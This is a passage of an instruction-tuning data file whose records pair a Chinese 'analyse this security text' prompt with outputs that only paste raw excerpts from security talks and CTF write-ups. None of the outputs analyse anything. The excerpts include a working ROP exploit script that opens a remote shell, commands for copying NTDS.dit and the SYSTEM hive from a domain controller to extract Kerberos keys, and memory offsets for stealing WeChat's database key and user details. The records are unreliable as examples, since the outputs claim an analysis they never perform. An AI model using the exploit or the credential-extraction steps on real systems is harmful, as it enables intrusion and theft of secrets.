Unisys, WYDEVoice  Service Providers  Cablevision, France Telecom, 8x8, ooma, WorldGate What is HD Voice? First--  What is narrowband voice?  Acoustic standards set in 1937  Since 37, FM radio, TV, CD, HDTV, HD radio  PSTN grade call = 3.4 kHz range  300 Hz to 3400 Hz  G.711 is VoIP equivalent, 64 kbp/s bandwidth What is HD voice?  Also known as wideband voice  Range of at least 7 kHz sampling; i.e. twice the range of G.711  G.722 codec is baseline HD voice:  30 Hz to 7000 Hz  2x PSTN/G.711  Still only need 64 kbit/s  Other HD voice codecs include AMR-WB, SILK, GIPS iSAC. HD - Looking at Hertz 0 5000 10000 15000 20000 25000 30000 Benefits from HD voice  Redu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLTE Recon and Tracking with RTLSDR An SDR SIGINT Primer Ian Kline Wolf Den Associates ian@wolfdenassociates.com PGP Public Key Lead: Emissions Inspection, Red Teams, Web App Pentests, Forensic Analyst, Hacker for Hire whoami Why should you listen Need a PoC quickly - start with open source research - integrate with commodity tools - you can be up and running an hour from now Fast Build PoCs without major $$$ investment - Start with RTLSDR-E4000 ~$50 - No need for other fancy LTE gear Cheap Enough about me, lets track some phones http://www.k4ro.net/k4ro/station_tour/images/station10.jpg Radio Used To Be Hard Now for $50... Either RTLSDR will do, but the E4000 can hit one more LTE band than the newer R820T RTLSDR - E4000 1 - Planes with ADS-B Quick RTLSDR Demos 2 - Cars by their TPMS output [Shove live TPMS feed from parking lot here] Quick RTLSDR Demos All this is great, but reading data != positional tracking. I want a tool with a big green arrow Data vs Positional HF/DF 1 - Field testing during WW2 2 - Measure signal strength and time of arrival 3 - Sink u-boats 4 - Required massive infrastructure HF/DF Time Difference of Arrival 1. Measure time of arrival of a signal at two different points 2. Take the difference 3. Draw a bearing TDOA DF 1. Requires extremely accurate clocking between radios TDOA DF - Challenges 2. High frequency signals exceed sampling rate of RTL-SDR platform TDOA DF - Challenges Doppler DF requires a high speed moving antenna 50,000+ RPMs for GSM Use hardware antenna switch to simulate doppler effect to determine bearing Pseudo Doppler DF Commercial PD DF System 1 - DF sync data when phones connect to towers 2 - Save it 3 - Plot it all with Kibana because thats easy Quick and Dirty LTE Tracker 3 - Tracking individuals by their LTE/GSM devices [Emissions Inspection Demo] Quick RTLSDR Demos", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOGeekWrite Up - Nu1L OGeekWrite Up - Nu1L catch fun babyrop book manager Pybox 2019 Upgrade LookAround render Easy Realworld Challenge mblockchain Hub 8v Babycry catch fun flag{Reno} babyrop ROP #!python #-*- coding: utf-8 -*- #@Date: 2019-08-24 11:39:14 from pwn import * context.log_level = 'debug' # p = process(\"./babyrop\") p =remote(\"47.112.137.238\",13337) elf = ELF(\"./babyrop\") libc = ELF(\"./libc-2.23.so\") # libc = ELF(\"/lib/i386-linux-gnu/libc.so.6\") p.send(\"\\x00\"*7+\"\\xff\"+24*\"\\x00\") p.send(\"A\"*0xeb+p32(0x8048548)+p32(0x080485A0)+p32(elf.got['puts'])) p.recvuntil(\"Correct\\n\") libc.address = u32(p.recvuntil(\"\\n\",drop=True))-libc.sym['puts'] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 book manager system = libc.sym['system'] log.info(\"system:\"+hex(system)) binsh = next(libc.search('/bin/sh')) log.info(\"binsh:\"+hex(binsh)) p.send(\"\\x00\"*7+\"\\xff\"+24*\"\\x00\") p.send(\"A\"*0xeb+p32(system)+p32(0x8048825)+p32(binsh)) p.interactive() 19 20 21 22 23 24 25 26 27 #!python #-*- coding: utf-8 -*- #@Date: 2019-08-24 19:06:12 from pwn import * ru = lambda x : p.recvuntil(x,drop=True) s = lambda x,y : p.sendafter(x,y) sl = lambda x,y: p.sendlineafter(x,y) p = remote(\"47.112.115.30\",13337) libc = ELF('./libc-2.23.so') s('create: ',\"A\"*0x1f) def add_chapter(name): sl('Your choice:',str(1)) s(\"Chapter name:\",name) def add_section(into,name,leak=False): addr = 0 sl('Your choice:',str(2)) s('into:',into) if leak: ru(\"0x\") addr = int(ru('\\n').ljust(0x8,'\\x00'),16) s('Section name:',name) return addr def add_text(into,num,text): sl('Your choice:',str(3)) s('into:',into) sl('write:',str(num)) s(\"Text:\",text) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 def dele_chapter(name): sl('Your choice:',str(4)) s('name:',name) def dele_section(name): sl('Your choice:',str(5)) s('name:',name) def dele_text(name): sl('Your choice:',str(6)) s('name:',name) def preview(): sl('Your choice:',str(7)) def update(choice,name,cnt,r=False): sl('Your choice:',st", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUnbootable Exploiting the PayLock SmartBoot Vehicle Immobilizer what is a boot? old school PayLock SmartBoot What Do I Do After My Car Gets Booted? by NYC Department of Finance well how else can I remove it? the wrong way the wrong way the wrong way Reverse Engineering the PayLock SmartBoot disassembly [insert disassembly image] the guts PIC16F628A use the tools at your disposal 10100010001111 11111111111111 11111111111111 11111111111111 00000011111111 00100000000011 00000110000011 00000011111110 00100000000100 00000011111101 10100010011001 01011010000011 11000011110000 00000010000110 01001110000001 01001010000011 we have output! 00000110101110 11000000001110 10000000100001 01100000000011 10100000011111 11000000001101 10000000100001 01100000000011 10100000011111 11000000001011 10000000100001 01100000000011 10100000011111 11000000000111 10000000100001 00100000101110 10100010001010 01010000000011 00000010000110 01111000000110 00000000001000 00101010101110 01111010000110 00000000001000 00101010101110 01111100000110 00000000001000 00101010101110 01111110000110 00000000001000 00101010101110 01000000000011 ... hexify and disassemble looks nice. what are we missing? EE EE EEPROM? EEPROM update our arduino code dump the eeprom data et voilà the right way [insert unlock video] (and dont forget to pay your parking tickets)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOracle Data Redaction is Broken David Litchfield [david.litchfield@datacom.com.au] 8th November 2013  Copyright Datacom TSS http://www.datacomtss.com.au Introduction Oracle data redaction is a simple but clever and innovative idea from Oracle. However, at present, there are weaknesses that undermine its effectiveness as a good security mechanism. These weaknesses can be exploited via web based SQL injection attacks and this paper details those weaknesses and provides suggestions on how it can be improved and made more secure. What is Oracle data redaction? Oracle data redaction allows you to redact or mask data returned by a query in order to help protect sensitive data, for example credit card details or social security numbers. Redaction doesn't change the data in anyway, rather just how the data is presented to the user. If a user attempts to query a redacted column all they will get is the redacted version of the data. The data can be fully redacted, partially redacted, redacted using regular expressions or even with random data. Oracle data redaction works by creating a redaction policy on a per column basis using the DBMS_REDACT PL/SQL package. By default only the EXECUTE_CATALOG_ROLE and IMP_FULL_DATABASE roles have the permission to use DBMS_REDACT but in the real world application developers would be given access too in order to protect their data. Before continuing... Before examining the weaknesses in Oracle data redaction, let's set up a sample application. We create a simple table called \"REDACTIONTEST\" with a credit card column called \"CC\". We then apply a redaction policy to the \"CC\" column using DBMS_REDACT so the credit card number is returned as 16 Xs: SQL> create table redactiontest (cc varchar(16), id number); Table created. SQL> insert into redactiontest (cc, id) values ('4111222233334444',1); 1 row created. SQL> commit; Commit complete. SQL> select cc, id from redactiontest; CC ID ---------------- ---------- 4111222233334444 1 SQL> BEGIN 2 SYS.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Reverse --- **教程实验** - [如何开始学习逆向以及分析恶意软件](https://www.freebuf.com/articles/rookie/178382.html) **相关资源** - [MicrosoftDocs/sdk-api](https://github.com/MicrosoftDocs/sdk-api) - windows sdk-api 的官方文档 **CTF writup** - [re学习笔记1 BUUCTF-re xor](https://blog.csdn.net/palmer9/article/details/102784520) - [不一样的 flag 题解](https://blog.y7n05h.xyz/%E4%B8%8D%E4%B8%80%E6%A0%B7%E7%9A%84flag/) - [BUUSimpleRev](http://91wxk.cn/index.php/archives/382/) - [BUUCTF-刮开有奖](https://zhuanlan.zhihu.com/p/100934324) - [BUU-刮开有奖](https://wdraemv.github.io/2021/06/10/BUU-%E5%88%AE%E5%BC%80%E6%9C%89%E5%A5%96/) --- ## 文件格式 - [文件头](./FILE/文件头.md) - [BMP](./FILE/BMP.md) - [ELF](./FILE/ELF.md) - [JPG](./FILE/JPG.md) - [PE](./FILE/PE.md) - [PNG](./FILE/PNG.md) - [RAR](./FILE/RAR.md) - [ZIP](./FILE/ZIP.md) --- ## 文件系统 --- ## 软件逆向 **相关资源** - [mentebinaria/retoolkit](https://github.com/mentebinaria/retoolkit) - 离线逆向工具安装包合集 **相关工具** - 反编译工具 - [Hex-Rays IDA pro](../安全工具/IDA.md) - [Ghidra](../安全工具/Ghidra.md) - 查壳 - ExeinfoPe - 十六进制编辑器 - https://hexed.it/ - 在线的 Hex Editor - 010editor - [WerWolv/ImHex](https://github.com/WerWolv/ImHex) - WinHex - HxD - UltraEdit --- ## 各类语言 ### python - [Python安全](../RedTeam/语言安全/Python安全.md) ### WebAssembly **相关工具** - [WebAssembly/wabt](https://github.com/WebAssembly/wabt) - 将 wasm 文件转换成 c 文件 ``` wasm2c.exe test.wasm -o test.c ``` **CTF writup** - [2021陇原战\"疫\" 部分赛题复现](https://mp.weixin.qq.com/s/KIkE50ELd2PBcbqZ_vUyQg) - [wasm逆向](http://unbelievable.cool/2021/07/15/wasm%E9%80%86%E5%90%91/) ### Go - [GO安全](../RedTeam/语言安全/GO安全.md)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAll Our Powers Combined Connecting Academics, Engineers, and Hackers Security Centered around conferences (DEFCON, HITCON, etc), CTF, and open-source projects. Full of students, hackers, etc. Labor of love. Striving for fulfillment. Enthusiast Community Enthusiasts Operates primarily out of university research labs. Full of professors, postdocs, PhD researchers. Labor of love + overhead. Striving for innovation. Academic Community Enthusiasts Academia Operates primarily out of for-profit companies. Full of brilliant engineers, hackers, etc. Labor of love + profit. Striving for usefulness. Industry Community Enthusiasts Academia Industry Enthusiasts Academia Industry Why? Why me? Created at UIUC in 2000. Open-sourced in 2003. Adopted by Apple in 2005. Continued use by academia and industry. Nested success stories in spin-off projects! - libfuzzer, KLEE, etc Example: LLVM Complications Arise Research? Academic meaning: invention, innovation, or understanding (novel research). Industry meaning: finding bugs in software (vulnerability research). Industry research... - finding a new bug - developing a new technique - developing a new tool - actionable results Academic research... - finding a new class of bug - developing a new technique - applying a technique in a new way - demonstrating potential Academics must present at academic conferences to survive. - constant need for novelty => short attention span - papers become very hard to approach Different goals of research limit interactions. - little cross-attendance between academic conferences, industry conferences, and enthusiast conferences This causes friction. - Tweet wars (printf turing-completeness, Cloak&Dagger, symbolic execution) - Duplicated effort. Terminology differences  Effects Better interaction venues: - USENIX WOOT (Workshop on Offensive Technologies) - USENIX Enigma - CSAW - NDSS BAR (Binary Analysis Research) Workshop More cross-pollination of ideas. - internships to industry, engineers going back to ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n通过将keytab导入wireshark中实现对 Kerberos协议加密部分进行直接解包 本文主要记录了如何通过一些列操作将生成的keytab导入wireshark实现可以在wireshark中直 接对Kerberos协议加密部分进行解密的一个过程避免大家踩坑 keytab是可以理解为一个密钥表是key table的缩写用途类似于用户的密码keytab中包含一个 或多个条目每个条目包含一个条目创建时的时间戳主体名密钥版本号加密类型以及密钥本身 具体关于keytab的信息可以上MIT的Kerberos实现网站上具体查看这里只大概介绍 具体操作过程如下 1.在域控中复制出一份ntds.dit文件这里用卷影复制的方法复制的时候要和自己的卷影副本卷名对 应 2.复制system.hive文件 vssadmin create shadow /for=C: copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\NTDS\\NTDS.dit C:\\ntds.dit 1 2 复制完成后删除之前创建的卷影副本 3.整一个esedbexport程序下载地址https://github.com/libyal/libesedb可以在各种平台编译我这 里在Ubuntu机器上编译不容易出错Windows编译太麻烦了 如果都比较顺利的话可以在/usr/local/bin下找到esedbexport命令 这里做一下知识扩展 这里我们要先了解的是ntds.dit文件是一种ESE数据库文件而ESE即Extensible Storage Engine 可扩展存储引擎是微软提出的一种数据存储技术文件后缀是.edbWindows内使用ESE存 储的有Microsoft Exchange ServerActive DirectoryWindows SearchWindows UpdateHelp and Support Center这里的esedbexport可以理解为将ntds.dit文件内的表进行了一个导出如果想 直接查看ESE数据库文件可以使用ESEDatabaseVies使用ESEDatabaseVies也可以进行一个导出 4.将复制出来的ntds.dit以及system.hive复制到Linux中我这里复制到了/usr/local/bin下并执行命 令可以将ntds.dit导出成多个文件文件会存放在当前目录的ntds.dit.export目录内 reg save hklm\\system system.hive 或者 copy \\\\? \\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\System32\\config\\SYSTEM C:\\system.hiv 1 2 3 vssadmin delete shadow /all 1 wget https://github.com/libyal/libesedb/releases/download/20210424/libesedb- experimental-20210424.tar.gz tar -xzvf libesedb-experimental-20210424.tar.gz cd libesedb-20210424/ sudo apt-get install autoconf automake autopoint libtool pkg-config #安装依赖包 ./configure make make install sudo ldconfig 1 2 3 4 5 6 7 8 9 esedbexport ntds.dit 1 5.使用NTDSXtract导出需要的keytab 执行后即可生成1.keytab文件 git clone https://github.com/csababarta/ntdsxtract.git cd ntdsxtract/ python dskeytab.py ../ntds.dit.export/datatable.3 ../ntds.dit.export/link_table.5 ../system.hive /usr/local/bin/ntdsxtract/ 1.keytab #datatable以及link_table都是esedbexport处理过ntds.dit之后存在ntds.dit.export中的文 件 #system.hive 是之前导出的文件 #/usr/local/bin/ntdsxtract/ 是当前ntdsxtract目录 #1.keytab是最后我们需要的keytab文件 1 2 3 4 5 6 7 6.生成完成后我们可以", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTHE ROAD LESS SURREPTITIOUSLY TRAVELED @pukingmonkey DEF CON 21 THE LOSS OF LOCATIONAL PRIVACY WHILE TRAVELING IN YOUR AUTOMOBILE  Automatic License Plate Readers (ALPRs)  Snitch devices in your car  Transponder based Electronic Toll Collection (ETC)  GPS  Smart phones traffic apps  Dumb phones  Automatic tire pressure monitors DO YOU HAVE THE RIGHT TO TRAVEL? Interstate: YES. Saenz v. Roe (1999) the right to travel that is guaranteed by the Privileges or Immunities Clause of the Fourteenth Amendment. Intrastate: YES. But not as clear, it's usually derived from First Amendment freedom of association and Fifth Amendment due process protection. International: YES. Kent v. Dulles (1958) The right to travel is a part of the \"liberty\" of which a citizen cannot be deprived without due process of law under the Fifth Amendment. DO YOU HAVE THE RIGHT TO DRIVE? NO It is a privilege, not a right, that is regulated, must be granted (licensed) and can be revoked, according to the prevailing laws of every jurisdiction of the United States. DO YOU HAVE THE RIGHT TO ANONYMOUS TRAVEL? Mostly YES but it depends on your mode of travel, in the U.S. you are not required to carry ID except:  when driving, it requires licensing NO  taking a commercial flight NO  crossing a national border NO AUTOMATIC LICENSE PLATE READERS A system of cameras, computers and GPS that reads the license plates (OCR), and notes coordinates and time, they can be mobile or fixed locations. Can do about 3,000 plates/hour, on moving vehicles up to 130MPH. All data is saved and downloaded to a central repository. SOME ALPRS Some ALPRs NOT ALPRs (nor red light cam) NOT ALPRs (red light cam) WHATS THE BIG DEAL? Police have been running plates forever  Captures all plates in its field of vision  retained in databases along with pictures from 21 days to 5 years (depends on jurisdiction)  Enough APLRs and data points = tracked NYC: 108 fixed and 130 mobile APLRs as of 2009  Impossible to opt-out IS IT LEGAL TO DO THIS ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefCon 21, Las Vegas 2013 Lets Screw With nMap Gregory Pickett, CISSP, GCIA, GPEN Chicago, Illinois gregory.pickett@hellfiresecurity.com Hellfire Security Overview Nosey Bastards! All About Packet Normalization Working It All Out Putting It Into Practice Finishing Up Network Defenders We see scans and probes of our network every day From the inside and from the outside Everybody is targeting us Identifying our assets How They Do It Network stack implementation is highly discretionary Differences identify the operating system type and version Allowing Attackers to identify their targets By matching the headers of their target to known operating system implementations  then its likely a Windows 2003 Sever! Uses the following options MSS of 1460 Single NOP Window Size 0 Single NOP Single NOP Ending SACK If your target  Has a TTL of 128 Implications If they identify your assets  They know their weaknesses How to attack them successfully Without triggering your sensors TSA-Style patdowns  Its fact of life But does it have to be? Why cant we  Remove the differences To remove their advantage Strip them of their ability to fingerprint To significantly reduce their chance of success My Answer Packet ization OK. What is packet normalization? Not an entirely developed concept Many expressions but most incomplete  Normalization vs. Scrubbing Scrubbing is to do away with; cancel Normalization is to make normal, especially to cause to conform to a standard or norm Both are seen in varying degrees Scrubbing Used by a number of firewalls Randomize IP ID Clear IP DF Also  Set IP tos/dscp, and ttl IP Fragment Reassembly Primarily Concern Policy Violations Abnormal Packets Abnormal Flows Scrubbing Used by some network devices such as Cisco ACE and ASA Random TCP SEQ Clear TCP Reserved, and URG Clears TCP Options Minimum IP TTL Fragment Reassembly too  Primarily Concern Policy Violations Abnormal Packets Abnormal Flows Incoming Normalization Used by IPS and IDS devices IP Fragment Reas", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n最近在研究关于聊天软件的一些信息获取 对于微信来说获取个人信息就是读取内存中的字符串这些字符包括电话数据库keyusername wxid等等但是微信不同的版本字符串在内存中的位置不一样也就是偏移不一样看之前的 BIOPASS RAT ,它的微信模块定位使用版本号不同版本号的偏移不一样 艹老师说这种方式太麻烦了微信每更新一个版本就得更新偏移于是我研究了根据微信特定数据结 构定位的方式这种方式可以全版本通用 定位 因为我的主要目的是获取数据库的key通过看雪的这篇文章 https://bbs.pediy.com/thread-251303.htm 可以得到我的key 地址是 14DA32A0 打开CE搜索这个地址会得到一个基址 0xE0,0xF6,0x79,0x4E,0x14,0xE9,0x41,0x02,0x99,0xD4,0x0C,0x40,0xFD,0x29,0x57,0x2F, 0x5A,0x19,0x84,0xFD,0x06,0xBE,0x4A,0xBF,0x82,0xBE,0xAE,0xC7,0x61,0x94,0xD2,0xD1 在x32dbg定位到这个地方 这个基址不仅保存了数据库key的地址还有wxid的地址在往上可以翻到头像地址username手机 号等等信息 说明这是微信中一个保存个人信息的全局变量的地方那么只需要找可以明显定位到这里的机器码或字 符串就可以了这个可能需要不同微信版本反复测试我比较懒找了一个比较明显的字符串 在往下滑可以看到公钥和私钥 而 -----BEGIN PUBLIC 就是一个很明显的特征 代码 于是根据这个思路编写代码先寻找 -----BEGIN PUBLIC 字符串的地址再反向搜索这个地址的地址为 简单称这个地址为地址2吧然后地址2要大于 WeChatWin.dll 的基址 我们就能定位到上图中 7A05201C 的地方然后以这个地方为原点向上或向下取偏移获取数据就能 得到个人信息的数据了 这里给出我定位的数据结构偏移 手机型号 $-C 文本长度 $-1c地址 读wxid $-44 文本长度 $-54 地址指针 读微信昵称 $-5c 文本长度 $-6c 地址 头像地址 $-1a8 地址指针 $-198 长度 $-190 地址指针 $-180 长度 手机号 $-43c 地址 $-42c 长度 公钥 $ 文本指针地址 $+10 长度 私钥 $+18 文本指针地址 $+28 长度 数据库 $-90 数据库密钥指针地址 $-8c 指针长度 用易语言简单实现的demo 程序运行截图 测试微信全版本都可以使用", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n/* * Copyright 2015-2018 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the \"License\"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an \"AS IS\" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package example.users; import javax.persistence.Embeddable; import lombok.EqualsAndHashCode; import org.springframework.util.StringUtils; /** * value object to represent user names. * * @author Oliver Gierke */ @EqualsAndHashCode @Embeddable public class Username { private final String username; Username() { this.username = null; } /** * Creates a new {@link Username}. * * @param username must not be {@literal null} or empty. */ public Username(String username) { if (!StringUtils.hasText(username)) { throw new IllegalArgumentException(\"Invalid username!\"); } this.username = username; } /* * (non-Javadoc) * @see java.lang.Object#toString() */ @Override public String toString() { return username; } }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# HITCON 2019 Quals Team: c7, nazywam, msm, chivay, Eternal, rodbert, rev, shalom ### Table of contents * [Lost modulus again(crypto)](lost_modulus) * [HeXdump (misc)](hexdump) * [Lost key again(crypto)](lost_key) * [Crypto in the Shell (pwn)](crypto_in_the_shell)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n云虚拟化安全QEMU的安全探索 和防御 0 1 钱文祥 (@leonwxqian) Tencent Blade Team高级安全研究员  云虚拟化IoT浏览器等安全研究  发现NVIDIA vGPU等逃逸漏洞Amazon EchoGoogle Home音箱浏览器中麦哲伦 SQLiteCurl的多个远程代码执行漏洞等  多次在著名会议上参讲 0 2 n Tencent Blade Team由腾讯安全平台部在2017年底成立 n 专注于AIoT移动互联网云虚拟化技术可信计算等前沿领域的安全技术研究 n 向GoogleMicrosoft AppleAmazonHuawei等诸多国际知名公司报告过200+安全漏洞 n 研究成果多次入选BlackHatDEFCONCanSecWestHITBPOCXcon等顶级安全大会 n 团队官网https://blade.tencent.com 云虚拟化 0 3  许多种云服务需要从一个物理硬件系统创建多个模拟环境  实现这个技术的核心便是虚拟化具体则是Hypervisor层  Hypervisor是一种运行在基础物理服务器和操作系统之间的中间 软件层可允许多个guest操作系统和应用共享硬件  典型的代表有QEMU-KVMXenVMwareHyper-V等等 Hypervisor的位置 0 4  Hypervisor是用户Guest和云服务提供商的 边缘  Host是总管理员上面可运行大量虚拟化机器  用户看来Guest就是一台电脑用户可以完全 控制Guest  但是如果有漏洞允许用户从Guest中穿透到Host上则会对主机的隐私性安全性造成 极大危害 QEMU中的存储 0 5  存储一直是各虚拟机/容器的重要的攻击面  常见的存储模式有PATA/SATA/virtio-blk/virtio-sata  Virtio方式是QEMU默认支持功能中性能最高的存储使用方式  若不可使用virtio驱动程序则x86一般可以使用AHCI (SATA)以提高效率  QEMU的AHCI模块中发现了一个任意长度越界读写的问题  CVE-2020-29443 https://qemu.org/2021/01/19/virtio-blk-scsi-configuration/ AHCI高级主机控制接口设备简介 0 6  AHCIV(AdvanceVHostVControllerVInterface)由 IntelV开发用于提速 SATAV设备的数据处理  AHCI是SATA的技术SATA是PATA原称ATA演变而来的接口  从QEMU源码树上看PATA/SATA/AHCI都共享一部分源码  AHCI可使用MMIO直接地访问磁盘而无需像IDE那样使用复杂的PMIO命令序列  AHCI控制器是具有总线主控能力的 PCIV设备  AHCIV控制器是系统内存和 SATAV设备之间的数据传输引擎  但AHCI的文档很少常用的参考资料是 IntelVAHCIV规范和Linux源码 0 7 按此顺序 1 FIS 2 ATAPI 3 PRDT FIS 帧信息结构 0 8  SATA使用FIS(FrameV InformationVStructure)包在主机和设备之间传输数据  SATA使用与PATA相同的命令集SATA/PATA控制上最明显的区别就是FIS  可以将FIS视为传统任务文件的数据集或ATA命令的封装  共有下列几种FIS指令  RegisterVFISV- hostVtoVdeviceV  RegisterVFISV- deviceVtoVhost  DMAVactivateVFISV- deviceVtoVhostVV  DMAVsetupVFISV bidirectional  DataVFISV bidirectional  BISTVactivateVFISV bidirectional  PIOVsetupVFISV- deviceVtoVhost  SetVdeviceVbitsVFISV- deviceVtoVhost ATAPI Command 0 9  ATAPIV是一种向连接到 ATAV总线的光驱或磁带驱动器发出SCSI命令的方法  最重要的是 PACKET 命令 (0xA0)V和 IDENTIFYVPACKETVDEVICEV(0xA1)命令  PACKET由1个字节SCSI命令后跟 11个字节的数据组成  QEMU中名为WIN_PACKETCMD0xA0 PRDT 1 0  全称为物理区域描述表PhysicalVRegionVDescriptorVTable  PRDT的每一项为16字节分别有下列含义  DBA是一个物理地址它是读操作的目标地址或者写操作的源地址  DBC则用于指示每次操作的字", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n议题 捡 漏 式 挖掘CVE漏 洞 演 讲人 朱铜庆 ID Dawu 部 门/职 位 404实验室 研究方向 Web/Windows 逻 辑漏 洞相 关 标签  联 系 方式  漂 流 瓶 吧 历史上的捡 漏 01 02 03 总 结 和归纳 提升和突破 01 历史上的捡 漏 广撒 网 总 有鱼 ZoomEye寻 找未授权访问 的页面 ZoomEye md5(admin,32) = 21232f297a57a5a743894a0e4a801fc3 也许厂商和你都 没 想到 这 个补丁是 假 的 CVE-2016-10033 -> CVE-2016-10045 mail ( string $to , string $subject , string $message [, string $additional_headers [, string $additional_ parameters ]] ) CVE-2016-10033 -> CVE-2016-10045 CVE-2016-10033 -> CVE-2016-10045 Escapeshellarg() CVE-2016-10033 -> CVE-2016-10045 Escapeshellcmd() CVE-2016-10033 -> CVE-2016-10045 项 目在 多年的迭 代的过程 中 总 会忘记 一些东 西 考 虑到所 有的情 况 在 其它 平 台/地方是否有同 样的问 题 CVE-2017-17562 可控 的LD_PRELOAD 动 态链 接 库劫持导致远程 命 令执行 CVE-2017-17562 CGI的运 行模式  在 这 个CGI程 序 被执行前 Web服务器 要为该 CGI程 序 设置 一些环 境 变量 这 些环 境 变量 被 服务器 用来 向CGI程 序 传递 一些非 常 重 要的信息 例如 当 前Web服务器 的状 态谁 发出的 调 用等等Web服务器 为CGI程 序 所 设置 的环 境 变量 的使用和正 常 的环 境 变量 的使用没 有 任何区别当 CGI程 序 运 行结 束 时  Web服务器 为它 设置 的环 境 变量 也随着消 失 原 文 链 接  https://blog.csdn.net/nyist327/article/details/41049699 沿伸 如 何在 终 端下模拟运 行CGI CVE-2017-17562 /proc/self/fd/0 -> stdin CVE-2017-17562 可控 的LD_PRELOAD 动 态链 接 库劫持导致远程 命 令执行 CVE-2017-17562 CVE-2017-17562 环 境 变量 添加/覆盖的技巧 可以用于  Windows /*nix /proc/self/fd/0的技巧 可以用于 *nix CVE-2017-17562 Windows 下可以控 制环 境 变量  可以劫持DLL 但是无法设置 DLL Linux 下LD_ 开头的环 境 变量 已经被禁 止 并且无法绕 过 MacOs 厂商在 同 一个地方修了很多次  那就 意 味 着 你也可以找到绕 过 这 个厂商修复水 平 不 足 历史漏 洞也可能 存 在 类似问 题 这 个厂商整体水 平 不 行 可以在 新的地方找到新的漏 洞 ColdFusion 上传漏 洞   Round 1 可以上传 JSP  把JSP后 缀假如 黑 名单 ColdFusion 上传漏 洞   Round 2 可以上传 JSP  把JSP后 缀加入黑 名单 可以上传JSPX  把JSPX后 缀加入黑 名单 ColdFusion 上传漏 洞   Round 3 可以上传 JSP  把JSP后 缀加入黑 名单 可以上传JSPX  把JSPX后 缀加入黑 名单 Fuzz , 特殊字符绕 过  shell.jsp. ColdFusion 上传漏 洞   Round 1 开发人员 缺乏安全意 识 打哪修哪 这 种漏 洞 你也可以捡 到 历史漏 洞 也可以去看看 ColdFusion持续爆 发了多个高危漏 洞 02 总 结 和归纳 优势  1. 入门门槛低 知道 漏 洞原 理 花 费时 间就 可以了 2. 认真 +全面排 查  就 可以找到漏 网之鱼 3. 我们 只需 要比 修复人员 更 专业就 可以了 但是 捡 漏 是不 可能 一辈子捡 漏 的 学 习漏 洞利用方法 总 结 共性 来 达到对同 一类漏 洞的深 刻认知 例如  Linux下的LD_PRELOAD动 态库劫持 在 曾 经爆 发过的 Mysql Nginx提权中也被用到过 是否还可以在 其它 软件中存 在 类似的问 题 如 果 被过滤了 我们 是否还可以有别的绕 过方式  一", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Writeup ASIS CTF Finals 2015 Uczestniczyliśmy (Rev, Shalom, other019, nazywam, pp i msm) w finałach ASIS CTF, i znowu spróbujemy opisać zadania z którymi walczyliśmy (a przynajmniej te, które pokonaliśmy). Ogólne wrażenia: - Pierwszy CTF gdzie pierwsze punkty udało nam się zdobyć dopiero po kilku godzinach. - Wyjątkowo dużo zadań nad którymi musieliśmy pracować w kilka osób (robiąc research, pisząc część skryptów etc.). Zwykle jedno zadanie rozwiązuj 1-2 osoby, tutaj było kilka nad którymi pracowały 3-4 osoby na raz. - Przeważająca większość zadań to re, pwn i crypto, czyli generalnie kategorie w których nie jesteśmy najmocniejsi. Opisy zadań po kolei. # Spis treści: * [AsisHash (re 150)](re_150_asishash) * [Big Lie (forensic 100)](forensic_100_big_lie) * [Bodu (crypto 175)](crypto_175_bodu) * [Calcexec I (pwn 200)](pwn_200_calcexec_I) * [Calm Down (trivia 75)](trivia_75_calm_down) * [ExampleFlag (trivia 1)](trivia_1_example_flag) * [Fake (re 150)](re_150_fake) * [FlagHunter (misc 75)](misc_75_flaghunter) * [Impossible (web 225)](web_225_impossible) * [License (re 125)](re_100_license) * [MeowMeow (misc 75)](misc_75_meowmeow) * [Shop-1 (pwn 100)](pwn_100_shop_1) * [Strange (forensic 150)](forensic_150_strange) # Zakończenie Zachęcamy do komentarzy/pytań/czegokolwiek.", "category": "text_analysis", "source": "security_papers"}
